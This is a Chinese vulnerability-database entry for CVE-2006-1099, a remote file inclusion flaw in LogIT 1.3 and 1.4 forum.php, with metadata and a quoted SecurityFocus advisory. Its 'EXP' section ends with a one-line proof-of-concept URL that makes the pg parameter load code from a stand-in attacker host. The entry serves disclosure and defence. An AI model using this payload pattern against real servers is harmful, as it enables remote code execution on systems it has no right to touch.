LogIT 'forum.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109859 漏洞类型 输入验证
发布时间 2006-03-02 更新时间 2006-03-10
CVE编号 CVE-2006-1099 CNNVD-ID CNNVD-200603-156
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27345
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-156
|漏洞详情
logIT1.3和1.4的forum.php中的PHP远程文件包含漏洞,可让远程攻击者通过pg参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/16932/info

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.

Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. 

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

http://www.example.com/?pg=http://www.example2.com/evilcode
|参考资料

来源:BID
名称:16932
链接:http://www.securityfocus.com/bid/16932